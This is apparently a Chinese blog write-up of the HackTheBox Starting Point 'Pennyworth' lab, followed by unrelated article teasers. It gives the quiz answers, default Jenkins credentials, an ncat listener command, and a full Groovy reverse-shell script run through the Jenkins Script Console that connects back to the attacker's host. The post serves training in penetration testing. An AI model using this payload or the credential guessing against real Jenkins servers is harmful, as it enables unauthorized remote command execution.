HackTheBox-Starting Point--Tier 1---Pennyworth

文章目录

    • 一 题目
    • 二 实验过程


一 题目

Tags

Web、Common Applications、Jenkins、Java、Reconnaissance、Remote Code Execution、Default Credentials译文:Web、常见应用、Jenkins、Java、侦察、远程代码执行、默认凭证

Connect

To attack the target machine, you must be on the same network.Connect to the Starting Point VPN using one of the following options.
It may take a minute for HTB to recognize your connection.If you don't see an update after 2-3 minutes, refresh the page.译文:要攻击目标机器,您必须位于同一网络上。使用以下选项之一连接到起点 VPN。
HTB 可能需要一分钟才能识别您的连接。如果 2-3 分钟后没有看到更新,请刷新页面。

SPAWN MACHINE

Spawn the target machine and the IP will show here.译文:生成目标机器,IP 将显示在此处

TASK 1

What does the acronym CVE stand for?译文:CVE缩写代表什么?答:Common Vulnerabilities and Exposures

TASK 2

What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?译文:CIA 中的三个字母,指的是 CIA 在网络安全方面的哪三个方面?答:Confidentiality, Integrity, Availability

TASK 3

What is the version of the service running on port 8080?译文:8080 端口上运行的服务版本是什么?答:Jetty 9.4.39.v20210325

TASK 4

What version of Jenkins is running on the target?译文:目标上运行的 Jenkins 版本是什么?答:2.289.1

TASK 5

What type of script is accepted as input on the Jenkins Script Console?译文:Jenkins 脚本控制台接受什么类型的脚本作为输入?答:Groovy

TASK 6

What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?译文:如果目标 VM 运行 Windows,Groovy 脚本片段中的“String cmd”变量等于什么?答:cmd.exe

TASK 7

What is a different command than "ip a" we could use to display our network interfaces' information on Linux?译文:我们可以使用什么命令来显示 Linux 上的网络接口信息,而不是“ip a”?答:ifconfig

TASK 8

What switch should we use with netcat for it to use UDP transport mode?译文:我们应该对 netcat 使用什么开关才能使用 UDP 传输模式?答:-u

TASK 9

What is the term used to describe making a target host initiate a connection back to the attacker host?译文:用于描述使目标主机发起与攻击者主机的连接的术语是什么?答:reverse shell

SUBMIT FLAG

Submit root flag译文:提交根标志

二 实验过程

1.端口扫描

nmap -sC -sV 10.129.152.201

在这里插入图片描述

2.访问8080端口

在这里插入图片描述

3.登录口没有做任何防御,进行爆破

账号密码:root/password

4.访问 :8080/script,利用Groovy命令获取反弹shell

在Jenkins脚本控制台中,可以编写和运行Groovy脚本,尝试在Jenkins控制台插入反弹shell脚本。

# 在攻击机执行监听
ncat -nvlp 1234访问target_ip:8080/script,在Jenkins控制台插入Groovy脚本,点击run运行

在这里插入图片描述

String host="host_ip";
int port=监听端口;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

5.攻击者获取到shell

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/156790.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

MySQL数据库入门到精通——运维篇(1)

MySQL数据库入门到精通——运维篇(1) 1. 日志1.1 错误日志1.2 二进制日志1.3 查询日志1.4 慢查询日志 2. 主从复制2.1 主从复制的概述2.2 主从复制的原理2.3 主从复制的搭建2.3.1 服务器准备2.3.2 主库配置2.3.3 从库配置2.3.4 测试 1. 日志 在任何一种…

IDEA使用-通过Database面板访问数据库

文章目录 前言操作过程注意事项1.无法下载驱动2.“Database”面板不显示数据库表总结前言 作为一款强大IDE工具,IDEA具有很多功能,本文将以MariaDB数据库访问为例,详细介绍如何通过IDE工具的Database面板来访问数据库。 操作过程 不同的版本操作会略有差异,这里我们用于演…

Linux学习之进程二

目录 进程状态 R (running)运行状态与s休眠状态: disk sleep(深度睡眠状态) T (stopped)(暂停状态) t----tracing stop(追踪状态) X死亡状态(dead) Z(zombie)-僵尸进程 孤儿进程 进程优…

C++设计模式_20_Composite 组合模式

Composite 组合模式和后面谈到的Iterator,Chain of Resposibility都属于“数据结构”模式。Composite 组合模式核心是通过多态的递归调用解耦内部和外部的依赖关系。 文章目录 1. “数据结构”模式1.1 典型模式 2. 动机( Motivation )3. 模式定义4. Composite 组合模…

一条 SQL 是如何在 MyBatis 中执行的

前言 MyBatis 执行 SQL 的核心接口为 SqlSession 接口,该接口提供了一些 CURD 及控制事务的方法,另外还可以通过 SqlSession 先获取 Mapper 接口的实例,然后通过 Mapper 接口执行 SQL,Mapper 接口方法的执行最终还是委托到 SqlSe…

206. 反转链表、Leetcode的Python实现

博客主页:🏆看看是李XX还是李歘歘 🏆 🌺每天分享一些包括但不限于计算机基础、算法等相关的知识点🌺 💗点关注不迷路,总有一些📖知识点📖是你想要的💗 ⛽️今…

【计算机网络】同源策略及跨域问题

1. 同源策略 同源策略是一套浏览器安全机制,当一个源的文档和脚本,与另一个源的资源进行通信时,同源策略就会对这个通信做出不同程度的限制。 同源策略对 同源资源 放行,对 异源资源 限制。因此限制造成的开发问题,称…

故障诊断模型 | Maltab实现BiLSTM双向长短期记忆神经网络故障诊断

文章目录 效果一览文章概述模型描述源码设计参考资料效果一览 文章概述 故障诊断模型 | Maltab实现BiLSTM双向长短期记忆神经网络故障诊断 模型描述 利用各种检查和测试方法,发现系统和设备是否存在故障的过程是故障检测;而进一步确定故障所在大致部位的过程是故障定位。故障…

如何创建一个react项目

文章目录 前言前言打开小黑窗口npm init vite后言 前言 hello world欢迎来到前端的新世界 😜当前文章系列专栏:react.js 🐱‍👓博主在前端领域还有很多知识和技术需要掌握,正在不断努力填补技术短板。(如果出现错误&am…

【NLP】什么是语义搜索以及如何实现 [Python、BERT、Elasticsearch]

语义搜索是一种先进的信息检索技术,旨在通过理解搜索查询和搜索内容的上下文和含义来提高搜索结果的准确性和相关性。与依赖于匹配特定单词或短语的传统基于关键字的搜索不同,语义搜索会考虑查询的意图、上下文和语义。 语义搜索在搜索结果的精度和相关…

机器人入门(四)—— 创建你的第一个虚拟小车

机器人入门(四)—— 创建你的第一个虚拟小车 一、小车建立过程1.1 dd_robot.urdf —— 建立身体1.2 dd_robot2.urdf —— 添加轮子1.3 dd_robot3.urdf —— 添加万向轮1.4 dd_robot4.urdf —— 添加颜色1.5 dd_robot5.urdf —— 添加碰撞检测(Collision …

【机器学习可解释性】4.SHAP 值

机器学习可解释性 1.模型洞察的价值2.特征重要性排列3.部分依赖图4.SHAP 值5.SHAP值的高级使用 正文 理解各自特征的预测结果? 介绍 您已经看到(并使用)了从机器学习模型中提取一般解释技术。但是,如果你想要打破模型对单个预测的工作原理? SHAP 值…